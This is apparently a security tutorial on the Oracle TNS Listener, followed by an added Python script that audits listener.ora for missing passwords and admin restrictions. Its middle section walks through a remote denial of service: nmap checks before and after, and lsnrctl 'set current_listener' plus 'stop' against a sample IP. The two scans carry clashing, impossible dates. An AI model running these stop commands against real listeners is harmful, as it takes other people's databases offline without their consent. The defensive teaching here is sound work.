OracleTNSLSNR
The Oracle TNS Listener is the lynchpin between a user/web server offering connection and the back-end database. As such, access to it should be restricted. The relevant files that control the listener are:
$ORACLE_HOME/bin/lsnrctl - This is the actual Listener control program
$ORACLE_HOME/network/admin/listener.ora - The actual TNS Listener config file
$ORACLE_HOME/bin/tnslsnr - The actual listening process.
This utility carries out the same functions as WinSid, but there are also a number of other functions this little tool will perform:
Command: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
****Notice the stop command (Easy DoS that!!)****
Note: I have found this tool to work on an ad hoc basis; the stability, I believe, is in question. Obviously all the commands listed above should work with Oracle 9i and below, but on Oracle 10g and above only the version command will return any interesting data. All other commands will error due to the security restrictions applied to the listener in 10g.
Obviously, if no password has been assigned to the listener, a malicious user can have a field day with your link to your backend database server, i.e.:

Before we issue any commands, we confirm the TNS listener port is open:

Step 1 - Ensure the listener is accepting connections

C:\nmap-4.21>nmap -n -p 1521 200.100.100.67
Starting Nmap 4.21 ( http://www.insecure.org/nmap ) at 2007-02-29 12:24 GMT Daylight Time
Interesting ports on 200.100.100.67:
PORT     STATE SERVICE
1521/tcp open  oracle
MAC Address: 00:02:B3:A7:69:EF (Intel)
Nmap finished: 1 IP address (1 host up) scanned in 0.281 seconds

Step 2 - Use the utility above and insert the command STOP and press connect. Alternatively, use the on-board Oracle LSNRCTL utility that controls the listener:

LSNRCTL> set current_listener 200.100.100.67
LSNRCTL> stop

Step 3 - Confirm the DoS has worked:

C:\nmap-4.21>nmap -n -p 1521 200.100.100.67
Starting Nmap 4.21 ( http://www.insecure.org/nmap ) at 2006-09-29 12:25 GMT Daylight Time
Interesting ports on 200.100.100.67:
PORT     STATE  SERVICE
1521/tcp closed oracle
MAC Address: 00:02:B3:A7:69:EF (Intel)
Nmap finished: 1 IP address (1 host up) scanned in 0.282 seconds

The moral of the story is: ASSIGN the listener a STRONG password!
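
An added example (not from the original page and not Oracle's own tooling): a defender's check that parses listener.ora and flags every listener with no PASSWORDS_<listener> entry, the condition the steps above depend on. It also checks ADMIN_RESTRICTIONS_<listener> = ON, a listener.ora setting not mentioned on the page that makes the listener refuse runtime SET commands; the sample file, host name and SID are constructed.

```python
import re

# Constructed sample listener.ora (not from the page); host and SID are made up.
SAMPLE = """\
LISTENER =
  (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost)(PORT = 1521)))
SID_LIST_LISTENER = (SID_LIST = (SID_DESC = (SID_NAME = ORCL)))
# second listener: password entry and admin restrictions present
LISTENER_HR = (ADDRESS = (PROTOCOL = TCP)(HOST = dbhost)(PORT = 1522))
PASSWORDS_LISTENER_HR = (0123456789ABCDEF)
ADMIN_RESTRICTIONS_LISTENER_HR = ON
"""

def parse_top_level(text):
    """Return {NAME: value} for every top-level 'NAME = value' entry."""
    text = re.sub(r"#.*", "", text)              # strip comments
    head = re.compile(r"\s*([A-Za-z_][\w.]*)\s*=\s*")
    entries, pos = {}, 0
    while (m := head.match(text, pos)):
        start = end = m.end()
        if text[start:start + 1] == "(":         # parenthesised value: find matching ')'
            depth = 0
            while end < len(text):
                depth += {"(": 1, ")": -1}.get(text[end], 0)
                end += 1
                if depth == 0:
                    break
        else:                                    # bare value: runs to end of line
            nl = text.find("\n", start)
            end = len(text) if nl == -1 else nl
        entries[m.group(1).upper()] = text[start:end].strip()
        pos = end
    return entries

def audit(text):
    """Map each listener name to its findings; an empty list means none."""
    entries = parse_top_level(text)
    derived = ("SID_LIST_", "PASSWORDS_", "ADMIN_RESTRICTIONS_")
    report = {}
    for name, value in entries.items():
        if name.startswith(derived) or "ADDRESS" not in value.upper():
            continue                             # not a listener definition
        findings = []
        if not entries.get("PASSWORDS_" + name, "").strip("() \t\n"):
            findings.append("no listener password set")
        if entries.get("ADMIN_RESTRICTIONS_" + name, "").upper() != "ON":
            findings.append("ADMIN_RESTRICTIONS not ON")
        report[name] = findings
    return report
```

Run audit() over the contents of $ORACLE_HOME/network/admin/listener.ora; any listener with a non-empty findings list needs attention before it is exposed on the network.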